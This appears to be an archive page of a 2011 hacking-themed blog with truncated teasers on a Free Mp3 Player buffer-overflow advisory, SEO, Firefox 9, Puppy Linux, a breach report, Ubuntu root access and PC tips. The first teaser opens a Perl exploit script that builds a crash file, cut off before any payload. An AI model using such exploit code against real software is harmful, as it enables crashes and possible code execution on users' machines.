Wednesday, 2024-04-24, 11:34 PM
Welcome Guest | RSS
Site menu
Login form
Buy Wifi Hacking Adapter
 

Best Laptop for Hacking
 










Main » Entries archive
« 1 2 ... 8 9 10 11 12 ... 24 25 »
Free Mp3 Player is prone to a remote buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer.An attacker can exploit this issue to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely result in denial-of-service conditions.

Free Mp3 Player 1.0 is vulnerable; other versions may also be affected.

Exploit Code

#!/usr/bin/perl
 
# Exploit Title:  Free Mp3 Player 1.0 Local Denial of Service
# Date: 19-12-2011
# Author: JaMbA
# Download:
http://www.softpedia.com/get/Multimedia/Audio/Audio-Players/Free-Mp3-Player.shtml
# Version: 1.0
# Tested on: Windows 7
 
my $file= "Crash.mp3";
my $junk= "\x41 ... Read more »
Views: 1387 | Added by: defaultNick | Date: 2011-12-22 | Comments (0)

There are many factors involved in getting your website ranking on search engines. Below are some key things to take into consideration, and we hope that it will help you to increase traffic on your blog website or forum :)

Anchor text

The anchor text of inbound links coming to your website is very important as search engines use this to determine what your site is about and what it should rank well for. Your anchor text should be your keywords that you want your website to rank for. For example, instead of using your company name or your website URL for inbound links, consider using keywords as your anchor text.

Use keywords in your title tag and other meta tags
Meta tags still hav ... Read more »

Views: 1360 | Added by: defaultNick | Date: 2011-12-22 | Comments (0)

Firefox 9 has been officially released. The latest update to the popular browser brings several new features and improvements, the biggest of which is a modification to the JavaScript engine that provides a big performance boost of up to 30 percent in some cases.

The latest Firefox uses type inference, a method of determining and setting the type of a JavaScript variable at runtime which leads to less overhead and more efficiently used memory. A more comprehensive explanation as well as some ... Read more »
Views: 1109 | Added by: defaultNick | Date: 2011-12-22 | Comments (0)

Puppy Linux is an evolutionary operating system, based on GNU Linux. What's different here is that Puppy is extraordinarily small, yet quite full featured. Puppy Linux can boot into a 64MB ramdisk, and that's it, the whole caboodle runs in RAM.


Unlike live CD distributions that have to keep pulling stuff off the CD, Puppy in its entirety loads into RAM. This means that all applications start in the blink of an eye and respond to user input instantly.

Puppy Linux has the ability to boot off a flash card or any USB memory device (flash-Puppy), CDROM (live-Puppy), Zip disk or LS/120/240 Superdisk (zippy-Puppy), floppy disks (floppy-Puppy), internal hard drive (hard-Puppy).

Puppy occupies about 50-60M on my USB Flash ... Read more »

Views: 1754 | Added by: defaultNick | Date: 2011-12-21 | Comments (1)

Chinese hackers broke into computers at the U.S. Chamber of Commerce and had access to everything on its systems including information on about 3 million of its members, according to a report in today's Wall Street Journal.

The
report quotes unnamed sources as saying that the intrusion was discovered and shut down in May 2010, possibly a year after the hackers may have first gained access to the chamber's networks.

According to the Journal, investigators have been unable to determine specifically what information may have been compromised. However, it appears that the hackers targeted four Chamber employees who worked on Asia policy, the Journal said. About six weeks' worth of email belonging to these four employees is believed ... Read more »
Views: 864 | Added by: defaultNick | Date: 2011-12-21 | Comments (0)

I knw you all are very good in computers but why i am writing this post is because, what i found is when every i got any pc of a B.Tech student(BookWorm Especially) or a Business Man. The worst thing i found is that their systems are full of unwanted software and adding charm on that they have not formatted computer from last 3 or 4 years. That means from the day of purchasing a new laptop they are using the same windows from last 3 years.

And at last they will say in Hindi ( Yaar dekhna iski speed badi slow ho gyi hai, In my heart i reply :- Abey speed to kam hogi hi bachee ki jaan lega 3 saal se to). Anyways so if you are from one of these which i think no one will be accepting ha ha then please read the below tips and make your PC run like a Firebullet :).


1.Let your PC boot up completely before opening any applications.

2.Refres ... Read more »
Views: 1243 | Added by: defaultNick | Date: 2011-12-21 | Comments (0)

Linux is from past considered as one of the best secure operating system. Almost virus free Ubuntu help you to stay safe from various cyber attacks. But here in this tute we will talk about hacking Ubuntu . We will try to hack Ubuntu's Root which is mostly not accessible by the user even if he is teh administrator so what to do so that we can access the Root of Ubuntu . I tried it on Ubuntu 11.10 it works . Here are some Steps you have to follow :-

Step 1:- Start Ubuntu and  Login to your user

Step 2:-  Open the terminal window

Step 3:- Now here type "sudo passwd root"

Step 4:-  Now type your password and press enter

Step 5:- Now type new ... Read more »
Views: 2000 | Added by: defaultNick | Date: 2011-12-21 | Comments (0)

Almost everyone of us using the Intel Processors may be i3 , i5 or even i7 too. But what exactly running in these processors do you know?. Here in this tute today i will tell you what it is inside of Intel's  processors. Starting from Intel Core i3 to Intel Core i7 you will be know each and every inside pack of these processors.


Internal Pack of Core i3:

* Entry level processor.
* 2-4 Cores
* 4 Threads
* Hyper-Threading (efficient use of processor resources)
* 3-4 MB Catche
* 32 nm Silicon (less heat and energy)

Internal Pack of Core i5:

* Mid range processor.
* 2-4 Cores
* 4 Threads
* Turbo Mode (turn off core if not used)
* Hyper-Threading (efficient use of processor resources)
* 3-8 ... Read more »
Views: 1616 | Added by: defaultNick | Date: 2011-12-21 | Comments (0)

This is really irritating for me when in company students came for me to get study material everyone having a common virus that bring up some shortcuts of My Document. Here is the tutorial in which i will tell you how you can ruin these shortcut files.

Step 1:- Click on "Start" -->Run --> type cmd and click on OK.
Here I assume your pen drive letter as G:

Step 2:- Enter this command.

attrib -h -r -s /s /d g:\*.*

You can copy the above command --> Right-click in the Command Prompt and paste it.

Note : Don't forget to replace the letter g with your pen drive letter.

Now press "Enter".

Now check for your files and folder in Pen Drive.
Views: 1086 | Added by: defaultNick | Date: 2011-12-21 | Comments (0)

FTP (File Transfer Protocol) is an older protocol for moving files back and forth over the Internet and other networks. All modern web browsers still speak FTP, which was sometimes used as a substitute for HTTP in the early days of the web. FTP is still used often as a means of downloading large files.

Many web hosts still offer FTP as the preferred way of uploading new web pages to a website. However, because there is no encryption of your password, FTP is not the best choice for this purpose. And since there is no encryption of the files being moved, FTP is a poor choice indeed for more sensitive information.

SFTP (Secure FTP) is a popular replacement. Built on SSL, SFTP is just as secure as HTTPS. And most modern FTP clients, such as the free, high-quality FileZilla program for W ... Read more »
Views: 2991 | Added by: defaultNick | Date: 2011-12-21 | Comments (0)